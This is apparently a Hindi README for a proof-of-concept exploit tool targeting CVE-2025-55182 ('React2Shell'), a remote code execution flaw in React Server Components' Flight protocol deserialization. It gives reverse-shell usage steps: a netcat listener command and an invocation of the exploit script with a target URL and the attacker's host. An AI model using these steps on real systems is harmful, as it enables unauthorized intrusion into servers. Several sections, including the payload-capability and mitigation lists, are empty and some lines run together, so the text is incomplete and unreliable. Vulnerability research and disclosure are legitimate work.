
CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो React Server Components में निर्मित Flight प्रोटोकॉल पेलोड के माध्यम से एक बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता है।
CVE-2025-55182, जिसे React2Shell के नाम से भी जाना जाता है, एक गंभीर अनप्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता है जो React सर्वर कंपोनेंट्स पैकेजों (संस्करण 19.0, 19.1.0, 19.1.1 और 19.2.0) को प्रभावित करती है।
यह भेद्यता हमलावरों को प्रमाणीकरण की आवश्यकता के बिना, एक क्राफ्ट किए गए HTTP अनुरोध के माध्यम से संवेदनशील सर्वरों पर मनमाना कोड निष्पादन प्राप्त करने की अनुमति दे सकती है।
React सर्वर कंपोनेंट्स क्लाइंट और सर्वर के बीच आदान-प्रदान किए जाने वाले कंपोनेंट डेटा को सीरियलाइज़ और डीसीरियलाइज़ करने के लिए Flight प्रोटोकॉल का उपयोग करते हैं।
इस डीसीरियलाइज़ेशन प्रक्रिया के दौरान अनुचित सत्यापन, विशेष रूप से क्राफ्ट किए गए पेलोड को आंतरिक ऑब्जेक्ट संरचनाओं में हेरफेर करने और खतरनाक JavaScript निष्पादन प्रिमिटिव्स तक पहुँचने की अनुमति दे सकता है।
यह भेद्यता React सर्वर कंपोनेंट्स (RSC) Flight प्रोटोकॉल पेलोड के डीसीरियलाइज़ेशन के दौरान अपर्याप्त सत्यापन से उत्पन्न होती है।
विशेष रूप से क्राफ्ट किए गए पेलोड निम्नलिखित कर सकते हैं:
multipart/form-data अनुरोध भेजता हैअपनी मशीन पर लिसनर प्रारंभ करें:
nc -lvnp 4444
एक्सप्लॉइट चलाएँ:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
इस भेद्यता को शमित करने के लिए:
यह प्रोजेक्ट पूर्णतः निम्नलिखित के लिए प्रदान किया गया है:
लेखक इस सामग्री के दुरुपयोग या इससे होने वाली क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं। सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए उपयोगकर्ता स्वयं पूर्ण रूप से ज़िम्मेदार हैं।